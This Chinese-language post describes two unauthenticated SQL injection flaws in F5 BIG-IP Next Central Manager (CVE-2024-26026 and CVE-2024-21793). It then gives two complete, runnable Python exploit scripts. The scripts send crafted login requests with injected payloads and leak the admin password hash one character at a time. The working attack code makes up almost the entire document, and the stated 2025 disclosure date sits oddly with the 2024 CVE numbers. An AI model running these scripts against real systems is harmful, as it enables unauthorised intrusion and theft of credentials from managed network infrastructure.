## F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793)

F5 BIG-IP Next Central Manager 可用于全面管理、自动化和监控部署在任何地方的众多 BIG-IP Next 实例。2025年5月8日，官方披露其存在CVE-2024-26026&CVE-2024-21793 F5 BIG-IP Next Central Manager SQL注入漏洞，攻击者可在无需登陆的情况下利用注入获取数据库中的敏感信息。

## CVE-2024-26026
```python
import string
 
import requests
import urllib3
import argparse
 
urllib3.disable_warnings()
 
def encode_string(s: str) -> str:
    return ",".join([f"chr({ord(c)})" for c in s])
 
def leak_hash(target: str, target_user: str = "admin"):
    charset = string.digits + string.ascii_letters + '/.$'
    encoded_user = encode_string(target_user)
 
    URL = f"{target}/api/login"
    current_guess = ''
    while True:
        guessed = False
        for guess in charset:
            full_guess = encode_string(current_guess + guess + '%')
            stuff = requests.post(URL, json={
                "username": "fake_user",
                "password": "password",
                "provider_type": "LDAP",
                "provider_name": f"LDAPP'or' name = (select case when (password like concat({full_guess})) then chr(76)||chr(111)||chr(99)||chr(97)||chr(108) else chr(76) end from mbiq_system.users where username like concat({encoded_user}) limit 1)"
            }, verify=False).json()
            if "root distinguished name is required" in stuff["message"]:
                guessed = True
                current_guess += guess
                print("[+]", current_guess)
                break
        if not guessed:
            break
 
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Leak the admin password hash')
    parser.add_argument('target', type=str, help='The target URL')
    parser.add_argument('target_user', type=str, help='The target user', default='admin', nargs='?')
    args = parser.parse_args()
    leak_hash(args.target, args.target_user)
```


## CVE-2024-21793
```python
import string
 
import requests
import urllib3
import argparse
 
urllib3.disable_warnings()
 
 
def leak_hash(target: str, target_user: str = "admin"):
    URL = f"{target}/api/login"
 
    charset = string.digits + string.ascii_letters + '/.$'
 
    current_guess = ''
 
    while True:
        guessed = False
        for guess in charset:
            full_guess = current_guess + guess
            stuff = requests.post(URL, json={
                "username": f"fakeuser' or 'username' eq '{target_user}' and startswith('password','{full_guess}') or 'username' eq '1",
                "password": "password",
                "provider_type": "LDAP",
                "provider_name": "LDAP"
            }, verify=False).json()
            if stuff["status"] == 500:
                guessed = True
                current_guess += guess
                print("[+]", current_guess)
                break
        if not guessed:
            break
 
 
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Leak the admin password hash')
    parser.add_argument('target', type=str, help='The target URL')
    parser.add_argument('target_user', type=str, help='The target user', default='admin', nargs='?')
    args = parser.parse_args()
    leak_hash(args.target, args.target_user)
```